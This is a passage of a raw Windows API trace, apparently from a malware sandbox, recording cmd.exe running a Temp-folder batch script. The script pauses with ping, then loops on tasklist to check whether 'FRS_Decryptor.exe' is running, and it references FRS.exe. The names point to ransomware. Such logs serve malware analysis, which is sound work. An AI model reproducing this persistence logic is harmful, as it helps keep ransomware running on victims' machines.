(in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0141.126] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0141.126] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0141.126] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0141.126] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0141.126] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.126] GetFileType (hFile=0x2e8) returned 0x1 [0141.126] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0141.126] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0141.126] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0141.126] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0141.126] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0141.126] _get_osfhandle (_FileHandle=1) returned 0x28 [0141.126] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0141.126] _get_osfhandle (_FileHandle=0) returned 0x24 [0141.126] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0141.127] SetConsoleInputExeNameW () returned 0x1 [0141.127] GetConsoleOutputCP () returned 0x1b5 [0141.127] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0141.127] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.127] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0141.127] _open_osfhandle (_OSFileHandle=0x2e8, _Flags=8) returned 3 [0141.127] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.127] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0141.127] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0141.127] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0141.127] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0141.127] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0141.127] GetFileType (hFile=0x2e8) returned 0x1 [0141.127] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.127] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0141.127] _tell (_FileHandle=3) returned 2512 [0141.128] _close (_FileHandle=3) returned 0 [0141.128] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0141.128] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0141.128] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0141.128] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0141.128] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0141.128] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0141.128] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0141.128] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0141.128] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0141.128] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0141.128] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0141.128] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0141.128] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0141.128] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0141.128] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0141.128] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0141.128] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0141.128] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0141.128] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0141.128] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0141.128] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0141.128] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0141.128] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0141.128] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0141.128] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0141.128] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0141.128] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0141.128] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0141.128] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0141.128] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0141.128] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0141.128] _wcsicmp (_String1="ping", _String2="START") returned -3 [0141.128] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0141.128] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0141.128] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0141.128] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0141.128] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0141.128] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0141.128] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0141.128] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0141.129] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0141.129] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0141.129] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0141.129] SetErrorMode (uMode=0x0) returned 0x0 [0141.129] SetErrorMode (uMode=0x1) returned 0x0 [0141.129] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd67ba0, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0141.129] SetErrorMode (uMode=0x0) returned 0x1 [0141.129] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0141.129] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0141.129] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0141.129] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.129] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0141.129] GetLastError () returned 0x2 [0141.129] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.129] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59ff0 [0141.129] FindClose (in: hFindFile=0xd59ff0 | out: hFindFile=0xd59ff0) returned 1 [0141.129] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0141.129] GetLastError () returned 0x2 [0141.129] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59d70 [0141.130] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0141.130] GetFileType (hFile=0x28) returned 0x2 [0141.130] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0141.130] _dup (_FileHandle=1) returned 3 [0141.130] _close (_FileHandle=1) returned 0 [0141.130] _wcsicmp (_String1="nul", _String2="con") returned 11 [0141.130] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0141.130] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0141.130] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0141.130] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0141.130] SetErrorMode (uMode=0x0) returned 0x0 [0141.130] SetErrorMode (uMode=0x1) returned 0x0 [0141.130] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0141.130] SetErrorMode (uMode=0x0) returned 0x1 [0141.130] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0141.130] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0141.131] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0141.131] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.131] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0141.131] GetLastError () returned 0x2 [0141.131] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.131] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59d70 [0141.131] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0141.131] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0141.131] GetLastError () returned 0x2 [0141.131] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd5a0f0 [0141.131] FindClose (in: hFindFile=0xd5a0f0 | out: hFindFile=0xd5a0f0) returned 1 [0141.131] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0141.131] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0141.131] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0141.131] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0141.132] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0141.132] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0141.132] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x2b0, hThread=0x2b8, dwProcessId=0x844, dwThreadId=0x848)) returned 1 [0141.135] CloseHandle (hObject=0x2b8) returned 1 [0141.135] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0141.135] GetEnvironmentStringsW () returned 0xd30508* [0141.135] FreeEnvironmentStringsA (penv="=") returned 1 [0141.135] WaitForSingleObject (hHandle=0x2b0, dwMilliseconds=0xffffffff) returned 0x0 [0143.208] GetExitCodeProcess (in: hProcess=0x2b0, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0143.208] CloseHandle (hObject=0x2b0) returned 1 [0143.208] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0143.208] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0143.208] GetEnvironmentStringsW () returned 0xd7e510* [0143.208] FreeEnvironmentStringsA (penv="=") returned 1 [0143.208] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0143.208] GetEnvironmentStringsW () returned 0xd30508* [0143.208] FreeEnvironmentStringsA (penv="=") returned 1 [0143.208] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0143.208] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0143.208] _close (_FileHandle=3) returned 0 [0143.208] _get_osfhandle (_FileHandle=1) returned 0x28 [0143.208] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0143.209] _get_osfhandle (_FileHandle=1) returned 0x28 [0143.209] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0143.209] _get_osfhandle (_FileHandle=0) returned 0x24 [0143.209] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0143.209] SetConsoleInputExeNameW () returned 0x1 [0143.209] GetConsoleOutputCP () returned 0x1b5 [0143.209] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0143.209] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.209] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0143.210] _open_osfhandle (_OSFileHandle=0x2e8, _Flags=8) returned 3 [0143.210] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0143.210] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0143.210] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0143.210] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0143.210] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0143.210] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0143.210] GetFileType (hFile=0x2e8) returned 0x1 [0143.210] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0143.210] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0143.210] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0143.210] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0143.210] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0143.210] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0143.210] GetFileType (hFile=0x2e8) returned 0x1 [0143.210] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0143.210] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0143.210] _tell (_FileHandle=3) returned 2627 [0143.210] _close (_FileHandle=3) returned 0 [0143.210] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0143.210] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0143.210] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0143.210] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0143.211] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0143.214] feof (_File=0x76ea4c68) returned 0 [0143.214] ferror (_File=0x76ea4c68) returned 0 [0143.214] fgets (in: _Buf=0xd81598, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0143.747] feof (_File=0x76ea4c68) returned 0 [0143.747] ferror (_File=0x76ea4c68) returned 0 [0143.747] fgets (in: _Buf=0xd8639e, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0143.796] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0143.797] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd44016, cbMultiByte=78, lpWideCharStr=0xd43fc8, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0143.797] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0143.797] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0143.797] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0143.797] _open_osfhandle (_OSFileHandle=0x154, _Flags=8) returned 3 [0143.797] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.797] SetFilePointer (in: hFile=0x154, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0143.797] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.798] GetFileSize (in: hFile=0x154, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0143.798] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0143.798] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.798] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0143.798] _get_osfhandle (_FileHandle=3) returned 0x154 [0143.798] GetFileType (hFile=0x154) returned 0x1 [0143.798] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | 